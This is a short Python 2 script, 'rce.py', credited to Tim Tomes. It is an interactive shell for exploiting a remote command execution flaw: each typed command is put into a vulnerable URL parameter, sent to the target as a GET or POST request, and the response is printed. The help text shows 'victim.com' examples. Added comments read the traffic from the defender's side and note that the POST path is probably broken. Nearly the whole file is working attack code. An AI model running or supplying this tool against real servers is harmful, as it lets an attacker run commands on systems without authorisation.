#!/usr/bin/python -tt
import sys, urllib, re, urlparse
def usage():
    """Print the command-line help text and terminate the process.

    Never returns: sys.exit() is called with no argument once the text
    has been written to standard output.
    """
    # The text documents the '<rce>' marker, which the caller puts in the URL
    # at the position of the parameter whose value is replaced per request.
    help_text = """
rce.py - Tim Tomes (@LaNMaSteR53) (www.lanmaster53.com)
Usage:
./rce.py [options] ur<rce>l
Options:
-p - Use POST method instead of GET. Enter url as GET.
-h - Help. This menu.
<rce> - Location of vulnerable parameter.
Example:
./rce.py 'http://victim.com/query?vulnparam=<rce>&safeparam=value'
- Sends the attack as a GET request, replacing '<rce>' with the payload.
./rce.py -p 'http://victim.com/query?vulnparam=<rce>&safeparam=value'
- Parses the parameters from the url and sends the attack as a POST request, replacing '<rce>' with the payload.
"""
    print(help_text)
    sys.exit()
# Interactive client for an endpoint that runs a request parameter as a
# command on the server: each line typed at the prompt replaces the '<rce>'
# marker in the URL given on the command line and is sent as one HTTP request.
#
# Reading this from the defending side: every command is a separate request
# to the same path in which only one parameter value changes, and no request
# headers are set here, so the client identifies itself with whatever urllib
# sends by default (presumably a Python-urllib User-Agent -- verify against
# captured traffic). The weakness being used is on the server, where a
# request parameter reaches a command interpreter; that is where the fix goes.

# The first argument containing '://' is taken as the URL template.
base_url = next((candidate for candidate in sys.argv if '://' in candidate), '')

# usage() prints the help text and exits, so nothing below runs without a URL
# or when -h was given.
if base_url == '' or '-h' in sys.argv:
    usage()

# -p switches the request method from GET to POST.
post = '-p' in sys.argv

print("Type 'exit' to quit.")
while True:
    entered = raw_input("cmd> ")
    if entered.lower() == 'exit':
        sys.exit(2)

    # Plain string substitution: the typed text lands in the URL as entered.
    target = base_url.replace('<rce>', entered)

    if not post:
        body = urllib.urlopen(target).read()
    else:
        # Index 3 of the urlsplit() result is the query component.
        params = urlparse.urlsplit(target)[3]
        # Everything before the '?' that precedes the query string.
        site = target[:target.find(params) - 1]
        # NOTE(review): urlencode() is handed the raw query string rather than
        # a mapping or a sequence of pairs; Python 2's urlencode appears to
        # raise TypeError for a non-empty string, so traffic from the script
        # as published is likely GET only -- confirm before relying on this.
        body = urllib.urlopen(site, urllib.urlencode(params)).read()

    # Removes only bare tags such as <b> or </pre>; tags that carry attributes
    # do not match this pattern and stay in the printed output.
    body = re.sub("<\/*\w+?>", '', body)
    print('[*] Executed: %s\n%s' % (entered, body))